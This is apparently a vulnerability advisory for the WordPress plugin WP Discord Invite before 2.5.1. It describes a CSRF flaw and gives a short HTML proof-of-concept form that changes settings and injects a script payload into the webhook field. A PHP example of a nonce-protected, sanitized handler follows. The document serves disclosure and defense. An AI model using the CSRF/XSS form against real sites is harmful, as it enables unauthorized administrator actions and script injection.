WordPress Plugin Vulnerabilities

WP Discord Invite < 2.5.1 - Arbitrary Settings Update via CSRF

Description

The plugin does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to have those actions performed on behalf of a logged-in administrator by tricking the administrator into submitting a crafted request.

Proof of Concept

<html>
	<body>
		<!-- When a logged-in administrator submits this form, the browser attaches their session cookies and the plugin accepts the settings change without any nonce check -->
		<form method="POST" action="http://127.0.0.1/wp-admin/admin.php?page=wp-discord-invite-count">
			<input type="hidden" name="wp-discord-invite-oauth" value="1"/>
			<input type="hidden" name="webhook" value='"><script>alert(1);</script>'/>
			<input type="submit" value="Submit">
		</form>
	</body>
</html>
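The missing control is a request-origin check on the settings handler. The following is an added example, not the plugin's own code: a minimal WordPress settings handler for the admin page targeted by the PoC above, hardened with a nonce (wp_nonce_field / check_admin_referer) and a capability check, and storing the webhook value as a URL rather than arbitrary text. The option key, nonce action name and function names are assumptions; only the page slug and the two field names come from the PoC.

```php
<?php
// Added example, not the plugin's code. Shows how the settings form and its
// POST handler look once CSRF protection and a capability check are in place.
// Option key and nonce action are assumed names, not the plugin's.

const WPDI_EXAMPLE_OPTION       = 'wpdi_example_webhook';        // assumption
const WPDI_EXAMPLE_NONCE_ACTION = 'wpdi_example_save_settings';  // assumption

// Renders the settings form. wp_nonce_field() emits a hidden token bound to
// the current user and session; a page on another origin cannot obtain it,
// so a form like the one in the PoC fails the check below.
function wpdi_example_render_settings_form() {
    $current = get_option( WPDI_EXAMPLE_OPTION, '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=wp-discord-invite-count' ) ); ?>">
        <?php wp_nonce_field( WPDI_EXAMPLE_NONCE_ACTION, '_wpdi_nonce' ); ?>
        <input type="hidden" name="wp-discord-invite-oauth" value="1" />
        <label>Webhook URL
            <input type="url" name="webhook" value="<?php echo esc_attr( $current ); ?>" />
        </label>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

// Handles the submission. Without checks 1 and 2, any POST carrying the
// victim's admin cookies is accepted, which is exactly what the PoC relies on.
function wpdi_example_handle_settings_post() {
    if ( ! isset( $_POST['wp-discord-invite-oauth'] ) ) {
        return; // not this form's submission
    }

    // 1. Only users allowed to manage options may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. The nonce must be present and valid for this action and user.
    //    check_admin_referer() calls wp_die() itself when verification fails.
    check_admin_referer( WPDI_EXAMPLE_NONCE_ACTION, '_wpdi_nonce' );

    // 3. Store the value as a sanitized URL, restricted to https, instead of
    //    accepting arbitrary text such as the markup used in the PoC.
    $webhook = isset( $_POST['webhook'] ) ? esc_url_raw( wp_unslash( $_POST['webhook'] ) ) : '';
    if ( '' !== $webhook && 0 !== strpos( $webhook, 'https://' ) ) {
        wp_die( 'Webhook must be an https URL.', '', array( 'response' => 400 ) );
    }

    update_option( WPDI_EXAMPLE_OPTION, $webhook );
}
add_action( 'admin_init', 'wpdi_example_handle_settings_post' );
```

The nonce is the control that closes the advisory's finding; the capability check is a separate requirement (nonces prove intent, not authorization), and the URL sanitization limits what a successful settings write can contain. Restricting the accepted host to the Discord webhook endpoint would be a further tightening, not shown here.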

Affects Plugins

Fixed in 2.5.1

Miscellaneous

Original Researcher
Enrico Marcolini, Claudio Marchesini
Submitter
Enrico Marcolini, Claudio Marchesini
Verified
Yes

Timeline

Publicly Published
2023-09-26
Added
2023-09-26
Last Updated
2023-09-26
